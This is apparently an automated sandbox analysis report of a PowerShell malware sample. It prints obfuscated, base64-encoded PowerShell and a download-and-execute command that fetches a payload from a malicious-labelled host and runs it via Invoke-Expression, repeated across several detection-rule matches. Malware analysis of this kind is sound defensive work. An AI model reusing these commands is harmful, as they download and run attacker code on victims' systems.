kAKwAoAGIARABYAHYAVgAoADAAeAA2ADUAKQApACsAKABiAEQAWAB2AFYAKAAwAHgAMgA5ACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADIAOAApACkAKwAoAGIARABYAHYAVgAoADAAeAAyADgAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANAA3ACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADUANgApACkAKwAoAGIARABYAHYAVgAoADAAeAAyADAAKQApACsAKABiAEQAWAB2AFYAKAAwAHgAMgBhACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADcANQApACkAKwAoAGIARABYAHYAVgAoADAAeAA3ADQAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANgA5ACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADIAYQApACkAKwAoAGIARABYAHYAVgAoADAAeAA3ADQAKQApACsAKABiAEQAWAB2AFYAKAAwAHgAMgA5ACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADIAZQApACkAKwAoAGIARABYAHYAVgAoADAAeAA1ADYAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANgAxACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADYAYwApACkAKwAoAGIARABYAHYAVgAoADAAeAA3ADUAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANgA1ACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADIAZQApACkAKwAoAGIARABYAHYAVgAoADAAeAA0ADkAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANgBlACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADcANgApACkAKwAoAGIARABYAHYAVgAoADAAeAA2AGYAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANgBiACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADYANQApACkAKwAoAGIARABYAHYAVgAoADAAeAA0ADMAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANgBmACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADYAZAApACkAKwAoAGIARABYAHYAVgAoADAAeAA2AGQAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANgAxACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADYAZQApACkAKwAoAGIARABYAHYAVgAoADAAeAA2ADQAKQApACsAKABiAEQAWAB2AFYAKAAwAHgAMgBlACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADQANwApACkAKwAoAGIARABYAHYAVgAoADAAeAA2ADUAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANwA0ACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADQAMwApACkAKwAoAGIARABYAHYAVgAoADAAeAA2AGYAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANgBkACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADYAZAApACkAKwAoAGIARABYAHYAVgAoADAAeAA2ADEAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANgBlACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADYANAApACkAKwAoAGIARABYAHYAVgAoADAAeAA0AGUAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANgAxACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADYAZAApACkAKwAoAGIARABYAHYAVgAoADAAeAA2ADUAKQApACsAKABiAEQAWAB2AFYAKAAwAHgAMgA4ACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADIANwApACkAKwAoAGIARABYAHYAVgAoADAAeAAyADcAKQApACsAKABiAEQAWAB2AFYAKAAwAHgAMgBhACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADYANQApACkAKwAoAGIARABYAHYAVgAoADAAeAAyAGQAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANAA1ACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADcAOAApACkAKwAoAGIARABYAHYAVgAoADAAeAAyAGEAKQApACsAKABiAEQAWAB2AFYAKAAwAHgAMgA3ACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADIANwApACkAKwAoAGIARABYAHYAVgAoADAAeAAyAGMAKQApACsAKABiAEQAWAB2AFYAKAAwAHgAMwAxACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADIAYwApACkAKwAoAGIARABYAHYAVgAoADAAeAAyADQAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANQA0ACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADUAMgApACkAKwAoAGIARABYAHYAVgAoADAAeAA1ADUAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANAA1ACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADIAOQApACkAKwAoAGIARABYAHYAVgAoADAAeAAyAGMAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANQBiACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADQAZAApACkAKwAoAGIARABYAHYAVgAoADAAeAA2ADEAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANgBlACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADYAMQApACkAKwAoAGIARABYAHYAVgAoADAAeAA2ADcAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANgA1ACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADYAZAApACkAKwAoAGIARABYAHYAVgAoADAAeAA2ADUAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANgBlACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADcANAApACkAKwAoAGIARABYAHYAVgAoADAAeAAyAGUAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANAAxACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADcANQApACkAKwAoAGIARABYAHYAVgAoADAAeAA3ADQAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANgBmACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADYAZAApACkAKwAoAGIARABYAHYAVgAoADAAeAA2ADEAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANwA0ACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADYAOQApACkAKwAoAGIARABYAHYAVgAoADAAeAA2AGYAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANgBlACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADIAZQApACkAKwAoAGIARABYAHYAVgAoADAAeAA0ADMAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANgBmACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADYAZAApACkAKwAoAGIARABYAHYAVgAoADAAeAA2AGQAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANgAxACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADYAZQApACkAKwAoAGIARABYAHYAVgAoADAAeAA2ADQAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANQA0ACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADcAOQApACkAKwAoAGIARABYAHYAVgAoADAAeAA3ADAAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANgA1ACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADcAMwApACkAKwAoAGIARABYAHYAVgAoADAAeAA1AGQAKQApACsAKABiAEQAWAB2AFYAKAAwAHgAMwBhACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADMAYQApACkAKwAoAGIARABYAHYAVgAoADAAeAA0ADMAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANgBkACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADYANAApACkAKwAoAGIARABYAHYAVgAoADAAeAA2AGMAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANgA1ACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADcANAApACkAKwAoAGIARABYAHYAVgAoADAAeAAyADkAKQApACsAKABiAEQAWAB2AFYAKAAwAHgAMgA3ACkAKQApAA== MD5: 04029E121A0CFA5991749937DD22A1D9)
        • powershell.exe (PID: 4296 cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -NoP -Ex Bypass -C Set-Item Variable:7kM 'https://qqcxq1.dyheg.fun/7721972eb8e100d6923d14a4173e8f144785818bbaeca7b9.accdt';SI Variable:\C ([Net.WebClient]::New());Set-Variable 3h (((([Net.WebClient]::New()|Member)|Where{(Variable _ -ValueOn).Name -like'D*g'}).Name));(Variable C -Value).((Variable 3h -ValueOnl))((Item Variable:\7kM).Value)|&(GV *uti*t).Value.InvokeCommand.(((GV *uti*t).Value.InvokeCommand.PsObject.Methods|Where{(Variable _ -ValueOn).Name -like'*Co*d'}).Name)((GV *uti*t).Value.InvokeCommand.GetCommandName('*e-Ex*',1,$TRUE),[Management.Automation.CommandTypes]::Cmdlet) MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
          • conhost.exe (PID: 1608 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
  • cleanup
No configs have been found
No yara matches

System Summary

barindex
Source: Process startedAuthor: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix): Data: Command: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -NoP -Ex Bypass -C Set-Item Variable:7kM 'https://qqcxq1.dyheg.fun/7721972eb8e100d6923d14a4173e8f144785818bbaeca7b9.accdt';SI Variable:\C ([Net.WebClient]::New());Set-Variable 3h (((([Net.WebClient]::New()|Member)|Where{(Variable _ -ValueOn).Name -like'D*g'}).Name));(Variable C -Value).((Variable 3h -ValueOnl))((Item Variable:\7kM).Value)|&(GV *uti*t).Value.InvokeCommand.(((GV *uti*t).Value.InvokeCommand.PsObject.Methods|Where{(Variable _ -ValueOn).Name -like'*Co*d'}).Name)((GV *uti*t).Value.InvokeCommand.GetCommandName('*e-Ex*',1,$TRUE),[Management.Automation.CommandTypes]::Cmdlet) , CommandLine: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -NoP -Ex Bypass -C Set-Item Variable:7kM 'https://qqcxq1.dyheg.fun/7721972eb8e100d6923d14a4173e8f144785818bbaeca7b9.accdt';SI Variable:\C ([Net.WebClient]::New());Set-Variable 3h (((([Net.WebClient]::New()|Member)|Where{(Variable _ -ValueOn).Name -like'D*g'}).Name));(Variable C -Value).((Variable 3h -ValueOnl))((Item Variable:\7kM).Value)|&(GV *uti*t).Value.InvokeCommand.(((GV *uti*t).Value.InvokeCommand.PsObject.Methods|Where{(Variable _ -ValueOn).Name -like'*Co*d'}).Name)((GV *uti*t).Value.InvokeCommand.GetCommandName('*e-Ex*',1,$TRUE),[Management.Automation.CommandTypes]::Cmdlet) , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w h -e ZgB1AG4AYwB0AGkAbwBuACAAYgBEAFgAdgBWACgAJABrAEMAcgBiAHgAKQAgAHsAcgBlAHQAdQByAG4AIABbAGMAaABhAHIAXQA6ADoAQwBvAG4AdgBlAHIAdABGAHIAbwBtAFUAdABmADMAMgAoACQAawBDAHIAYgB4ACkAfQAmACgAKABiAEQAWAB2AFYAKAAwAHgANgA5ACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADYANQApACkAKwAoAGIARABYAHYAVgAoADAAeAA3ADgAKQApACkAKAAoAGIARABYAHYAVgAoADAAeAA1ADMAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANwA0ACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADYAMQApACkAKwAoAGIARABYAHYAVgAoADAAeAA3ADIAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANwA0ACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADIAZAApACkAKwAoAGIARABYAHYAVgAoADAAeAA1ADAAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANwAyACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADYAZgApACkAKwAoAGIARABYAHYAVgAoADAAeAA2ADMAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANgA1ACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADcAMwApACkAKwAoAGIARABYAHYAVgAoADAAeAA3ADMAKQApACsAKABiAEQAWAB2AFYAKAAwAHgAMgAwACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADIAMgApACkAKwAoAGIARABYAHYAVgAoADAAeAAyADQAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANgA1ACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADYAZQApACkAKwAoAGIARABYAHYAVgAoADAAeAA3ADYAKQApACsAKABiAEQAWAB2AFYAKAAwAHgAMwBhACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADUANwApACkAKwAoAGIARABYAHYAVgAoADAAeAA0ADkAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANABlACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADQANAApACkAKwAoAGIARABYAHYAVgAoADAAeAA0ADkAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANQAyACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADUAYwApACkAKwAoAGIARABYAHYAVgAoADAAeAA
Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 powershell -w h -e ZgB1AG4AYwB0AGkAbwBuACAAYgBEAFgAdgBWACgAJABrAEMAcgBiAHgAKQAgAHsAcgBlAHQAdQByAG4AIABbAGMAaABhAHIAXQA6ADoAQwBvAG4AdgBlAHIAdABGAHIAbwBtAFUAdABmADMAMgAoACQAawBDAHIAYgB4ACkAfQAmACgAKABiAEQAWAB2AFYAKAAwAHgANgA5ACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADYANQApACkAKwAoAGIARABYAHYAVgAoADAAeAA3ADgAKQApACkAKAAoAGIARABYAHYAVgAoADAAeAA1ADMAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANwA0ACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADYAMQApACkAKwAoAGIARABYAHYAVgAoADAAeAA3ADIAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANwA0ACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADIAZAApACkAKwAoAGIARABYAHYAVgAoADAAeAA1ADAAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANwAyACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADYAZgApACkAKwAoAGIARABYAHYAVgAoADAAeAA2ADMAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANgA1ACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADcAMwApACkAKwAoAGIARABYAHYAVgAoADAAeAA3ADMAKQApACsAKABiAEQAWAB2AFYAKAAwAHgAMgAwACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADIAMgApACkAKwAoAGIARABYAHYAVgAoADAAeAAyADQAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANgA1ACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADYAZQApACkAKwAoAGIARABYAHYAVgAoADAAeAA3ADYAKQApACsAKABiAEQAWAB2AFYAKAAwAHgAMwBhACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADUANwApACkAKwAoAGIARABYAHYAVgAoADAAeAA0ADkAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANABlACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADQANAApACkAKwAoAGIARABYAHYAVgAoADAAeAA0ADkAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANQAyACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADUAYwApACkAKwAoAGIARABYAHYAVgAoADAAeAA1ADMAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANwA5ACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADcAMwApACkAKwAoAGIARABYAHYAVgAoADAAeAA1ADcAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANABmACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADUANwApACkAKwAoAGIARABYAHYAVgAoADAAeAAzADYAKQApACsAKABiAEQAWAB2AFYAKAAwAHgAMwA0ACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADUAYwApACkAKwAoAGIARABYAHYAVgAoADAAeAA1ADcAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANgA5ACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADYAZQApACkAKwAoAGIARABYAHYAVgAoADAAeAA2ADQAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANgBmACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADcANwApACkAKwAoAGIARABYAHYAVgAoADAAeAA3ADMAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANQAwACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADYAZgApACkAKwAoAGIARABYAHYAVgAoADAAeAA3ADcAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANgA1ACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADcAMgApACkAKwAoAGIARABYAHYAVgAoADAAeAA1ADMAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANgA4ACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADYANQApACkAKwAoAGIARABYAHYAVgAoADAAeAA2AGMAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANgBjACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADUAYwApACkAKwAoAGIARABYAHYAVgAoADAAeAA3ADYAKQApACsAKABiAEQAWAB2AFYAKAAwAHgAMwAxACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADIAZQApACkAKwAoAGIARABYAHYAVgAoADAAeAAzADAAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANQBjACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADcAMAApACkAKwAoAGIARABYAHYAVgAoADAAeAA2AGYAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANwA3ACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADYANQApACkAKwAoAGIARABYAHYAVgAoADAAeAA3ADIAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANwAzACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADYAOAApACkAKwAoAGIARABYAHYAVgAoADAAeAA2ADUAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANgBjACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADYAYwApACkAKwAoAGIARABYAHYAVgAoADAAeAAyAGUAKQApA
Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -NoP -Ex Bypass -C Set-Item Variable:7kM 'https://qqcxq1.dyheg.fun/7721972eb8e100d6923d14a4173e8f144785818bbaeca7b9.accdt';SI Variable:\C ([Net.WebClient]::New());Set-Variable 3h (((([Net.WebClient]::New()|Member)|Where{(Variable _ -ValueOn).Name -like'D*g'}).Name));(Variable C -Value).((Variable 3h -ValueOnl))((Item Variable:\7kM).Value)|&(GV *uti*t).Value.InvokeCommand.(((GV *uti*t).Value.InvokeCommand.PsObject.Methods|Where{(Variable _ -ValueOn).Name -like'*Co*d'}).Name)((GV *uti*t).Value.InvokeCommand.GetCommandName('*e-Ex*',1,$TRUE),[Management.Automation.CommandTypes]::Cmdlet) , CommandLine: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -NoP -Ex Bypass -C Set-Item Variable:7kM 'https://qqcxq1.dyheg.fun/7721972eb8e100d6923d14a4173e8f144785818bbaeca7b9.accdt';SI Variable:\C ([Net.WebClient]::New());Set-Variable 3h (((([Net.WebClient]::New()|Member)|Where{(Variable _ -ValueOn).Name -like'D*g'}).Name));(Variable C -Value).((Variable 3h -ValueOnl))((Item Variable:\7kM).Value)|&(GV *uti*t).Value.InvokeCommand.(((GV *uti*t).Value.InvokeCommand.PsObject.Methods|Where{(Variable _ -ValueOn).Name -like'*Co*d'}).Name)((GV *uti*t).Value.InvokeCommand.GetCommandName('*e-Ex*',1,$TRUE),[Management.Automation.CommandTypes]::Cmdlet) , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w h -e ZgB1AG4AYwB0AGkAbwBuACAAYgBEAFgAdgBWACgAJABrAEMAcgBiAHgAKQAgAHsAcgBlAHQAdQByAG4AIABbAGMAaABhAHIAXQA6ADoAQwBvAG4AdgBlAHIAdABGAHIAbwBtAFUAdABmADMAMgAoACQAawBDAHIAYgB4ACkAfQAmACgAKABiAEQAWAB2AFYAKAAwAHgANgA5ACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADYANQApACkAKwAoAGIARABYAHYAVgAoADAAeAA3ADgAKQApACkAKAAoAGIARABYAHYAVgAoADAAeAA1ADMAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANwA0ACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADYAMQApACkAKwAoAGIARABYAHYAVgAoADAAeAA3ADIAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANwA0ACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADIAZAApACkAKwAoAGIARABYAHYAVgAoADAAeAA1ADAAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANwAyACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADYAZgApACkAKwAoAGIARABYAHYAVgAoADAAeAA2ADMAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANgA1ACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADcAMwApACkAKwAoAGIARABYAHYAVgAoADAAeAA3ADMAKQApACsAKABiAEQAWAB2AFYAKAAwAHgAMgAwACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADIAMgApACkAKwAoAGIARABYAHYAVgAoADAAeAAyADQAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANgA1ACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADYAZQApACkAKwAoAGIARABYAHYAVgAoADAAeAA3ADYAKQApACsAKABiAEQAWAB2AFYAKAAwAHgAMwBhACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADUANwApACkAKwAoAGIARABYAHYAVgAoADAAeAA0ADkAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANABlACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADQANAApACkAKwAoAGIARABYAHYAVgAoADAAeAA0ADkAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANQAyACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADUAYwApACkAKwAoAGIARABYAHYAVgAoADAAeAA
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 powershell -w h -e ZgB1AG4AYwB0AGkAbwBuACAAYgBEAFgAdgBWACgAJABrAEMAcgBiAHgAKQAgAHsAcgBlAHQAdQByAG4AIABbAGMAaABhAHIAXQA6ADoAQwBvAG4AdgBlAHIAdABGAHIAbwBtAFUAdABmADMAMgAoACQAawBDAHIAYgB4ACkAfQAmACgAKABiAEQAWAB2AFYAKAAwAHgANgA5ACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADYANQApACkAKwAoAGIARABYAHYAVgAoADAAeAA3ADgAKQApACkAKAAoAGIARABYAHYAVgAoADAAeAA1ADMAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANwA0ACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADYAMQApACkAKwAoAGIARABYAHYAVgAoADAAeAA3ADIAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANwA0ACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADIAZAApACkAKwAoAGIARABYAHYAVgAoADAAeAA1ADAAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANwAyACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADYAZgApACkAKwAoAGIARABYAHYAVgAoADAAeAA2ADMAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANgA1ACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADcAMwApACkAKwAoAGIARABYAHYAVgAoADAAeAA3ADMAKQApACsAKABiAEQAWAB2AFYAKAAwAHgAMgAwACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADIAMgApACkAKwAoAGIARABYAHYAVgAoADAAeAAyADQAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANgA1ACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADYAZQApACkAKwAoAGIARABYAHYAVgAoADAAeAA3ADYAKQApACsAKABiAEQAWAB2AFYAKAAwAHgAMwBhACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADUANwApACkAKwAoAGIARABYAHYAVgAoADAAeAA0ADkAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANABlACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADQANAApACkAKwAoAGIARABYAHYAVgAoADAAeAA0ADkAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANQAyACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADUAYwApACkAKwAoAGIARABYAHYAVgAoADAAeAA1ADMAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANwA5ACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADcAMwApACkAKwAoAGIARABYAHYAVgAoADAAeAA1ADcAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANABmACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADUANwApACkAKwAoAGIARABYAHYAVgAoADAAeAAzADYAKQApACsAKABiAEQAWAB2AFYAKAAwAHgAMwA0ACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADUAYwApACkAKwAoAGIARABYAHYAVgAoADAAeAA1ADcAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANgA5ACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADYAZQApACkAKwAoAGIARABYAHYAVgAoADAAeAA2ADQAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANgBmACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADcANwApACkAKwAoAGIARABYAHYAVgAoADAAeAA3ADMAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANQAwACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADYAZgApACkAKwAoAGIARABYAHYAVgAoADAAeAA3ADcAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANgA1ACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADcAMgApACkAKwAoAGIARABYAHYAVgAoADAAeAA1ADMAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANgA4ACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADYANQApACkAKwAoAGIARABYAHYAVgAoADAAeAA2AGMAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANgBjACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADUAYwApACkAKwAoAGIARABYAHYAVgAoADAAeAA3ADYAKQApACsAKABiAEQAWAB2AFYAKAAwAHgAMwAxACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADIAZQApACkAKwAoAGIARABYAHYAVgAoADAAeAAzADAAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANQBjACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADcAMAApACkAKwAoAGIARABYAHYAVgAoADAAeAA2AGYAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANwA3ACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADYANQApACkAKwAoAGIARABYAHYAVgAoADAAeAA3ADIAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANwAzACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADYAOAApACkAKwAoAGIARABYAHYAVgAoADAAeAA2ADUAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANgBjACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADYAYwApACkAKwAoAGIARABYAHYAVgAoADAAeAAyAGUAKQApA
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: https://qqcxq1.dyheg.fun/7721972eb8e100d6923d14a4173e8f144785818bbaeca7b9.accdtAvira URL Cloud: Label: malware
Source: https://qqcxq1.dyheg.funAvira URL Cloud: Label: malware
Source: https://qqcxq1.dyheg.fun/7721972eb8e100d6923d14a4173e8f144785818bbaecaAvira URL Cloud: Label: malware
Source: https://qqcxq1.dyheg.fun/7721Avira URL Cloud: Label: malware
Source: Submited SampleNeural Call Log Analysis: 88.2%
Source: unknownHTTPS traffic detected: 172.67.212.124:443 -> 192.168.11.20:49747 version: TLS 1.2
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.65018244073.00000000073A1000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: em.pdb source: powershell.exe, 00000005.00000002.64974512754.0000000002C25000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: em.pdbR|2l|2 ^|2_CorDllMainmscoree.dll source: powershell.exe, 00000005.00000002.64974512754.0000000002C25000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.64974512754.0000000002C36000.00000004.00000020.00020000.00000000.sdmp
Source: global trafficHTTP traffic detected: GET /7721972eb8e100d6923d14a4173e8f144785818bbaeca7b9.accdt HTTP/1.1Host: qqcxq1.dyheg.funConnection: Keep-Alive
Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
